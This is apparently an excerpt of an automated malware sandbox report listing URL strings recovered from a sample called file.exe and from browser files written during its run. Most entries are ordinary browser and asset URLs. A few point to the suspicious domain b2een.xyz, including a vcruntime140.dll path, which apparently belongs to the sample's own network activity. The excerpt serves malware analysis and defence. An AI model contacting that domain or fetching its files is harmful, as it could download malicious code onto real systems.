Source: file.exe, 00000000.00000002.3130563158.0000000003425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://b2een.xyz/vcruntime140.dlln
Source: file.exe, 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://b2een.xyzIECBKEGH
Source: file.exe, 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://b2een.xyztosh;
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://bard.google.com/
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://bit.ly/wb-precache
Source: file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.00000000034C6000.00000004.00000020.00020000.00000000.sdmp, JJECAA.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.00000000034C6000.00000004.00000020.00020000.00000000.sdmp, JJECAA.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://browser.events.data.msn.com/
Source: Reporting and NEL.11.dr	String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://c.msn.com/
Source: file.exe, 00000000.00000003.2626944961.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578181796.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, DHJKJK.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2626944961.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578181796.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3132012016.00000000035FB000.00000004.00000020.00020000.00000000.sdmp, GIJECG.0.dr, DHJKJK.0.dr, Web Data.10.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2626944961.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578181796.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3132012016.00000000035FB000.00000004.00000020.00020000.00000000.sdmp, GIJECG.0.dr, DHJKJK.0.dr, Web Data.10.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: manifest.json.10.dr	String found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json.10.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: 9de0937f-b92f-4031-b3cc-dad617b69ce6.tmp.11.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json0.10.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 9de0937f-b92f-4031-b3cc-dad617b69ce6.tmp.11.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.00000000034C6000.00000004.00000020.00020000.00000000.sdmp, JJECAA.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.00000000034C6000.00000004.00000020.00020000.00000000.sdmp, JJECAA.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: Reporting and NEL.11.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: manifest.json0.10.dr	String found in binary or memory: https://docs.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive.google.com/
Source: file.exe, 00000000.00000003.2626944961.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578181796.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3132012016.00000000035FB000.00000004.00000020.00020000.00000000.sdmp, GIJECG.0.dr, DHJKJK.0.dr, Web Data.10.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2626944961.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578181796.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3132012016.00000000035FB000.00000004.00000020.00020000.00000000.sdmp, GIJECG.0.dr, DHJKJK.0.dr, Web Data.10.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2626944961.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578181796.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3132012016.00000000035FB000.00000004.00000020.00020000.00000000.sdmp, GIJECG.0.dr, DHJKJK.0.dr, Web Data.10.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log3.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
Source: 000003.log3.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log3.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log4.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr, HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log3.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr, HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 000003.log3.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: chromecache_450.6.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_450.6.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_450.6.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_450.6.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://gaana.com/
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://img-s-msn-com.akamaized.net/
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
Source: JJECAA.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	String found in binary or memory: https://m.kugou.com/
